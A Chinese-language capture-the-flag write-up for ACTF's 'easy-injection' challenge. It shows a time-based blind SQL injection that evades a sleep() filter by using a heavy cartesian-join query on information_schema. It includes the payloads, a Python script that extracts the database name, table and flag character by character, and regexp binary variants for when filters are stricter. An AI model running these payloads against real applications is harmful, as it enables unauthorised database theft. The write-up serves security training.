来自actf的easy-injection
核心是过滤了sleep,可以用heavy-query
即
(SELECT count(*) FROM information_schema.columns A,information_schema.columns D, information_schema.columns B, information_schema.SCHEMATA C)
1、题目源码
image.png
2、因为没有回显,所以尝试构造时间盲注
image.png
3、本地测试,但是这题sleep被过滤,如下,发现1min还没跑完 :)
image.png
4、题目环境测试可以
payload为:
id=users where 1 and (SELECT count(*) FROM information_schema.columns A,information_schema.columns D, information_schema.columns B, information_schema.SCHEMATA C)#
image.png
5、写个脚本
# coding=utf-8
import requests
s = requests.session()
s.keep_alive = False
url="http://60.205.189.243:29019/"
flag=""
a = 0
tmp = 1
for i in range(1,40):
if tmp==0:
break
tmp = 0
for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.":
#过滤了sub , 用mid
data = "?id=users where 1 and ( SELECT mid( ( SELECT database() ) FROM "+str(i)+" FOR 1 ) = '"+str1+"' ) and sleep(5)#"
data = data.replace('sleep(5)','(SELECT count(*) FROM information_schema.columns A,information_schema.columns D, information_schema.columns B, information_schema.SCHEMATA C)')
url2 = url+data
print url2
try:
a = a + 1
print(a)
result = s.get(url2, timeout=3)
except requests.exceptions.ReadTimeout, e:
flag += str1
tmp = 1
print(flag)
break
1、得到数据库名为 columns_time_injection
2、得到 表名 Look_here,us1r
特别注意这里需要用ascii,否则会是look_here,可能是默认不区分大小写。。。
将 SELECT database() 改成 select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()
3、得到 列名 flag
将 select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database() 改成 select flag from
4、查flag
但是flag被过滤。。。。
方法1:select group_concat(x.1) from (select 1 union select * from Look_here)x
但是不知道为啥失败。。
方法2: select * from Look_here limit 1
成功
如果等号被过滤,可以利用regexp binary 或者 like binary
?id=users where 1 and (mid( ( select * from Look_here limit 0,1 ) FROM "+str(i)+" FOR 1 ) regexp binary '^"+chr(j)+"' ) and sleep(5)#
前面要加上
if chr(j)=='.' or chr(j)=='^' or chr(j)=='$' or chr(j)=='!':
continue
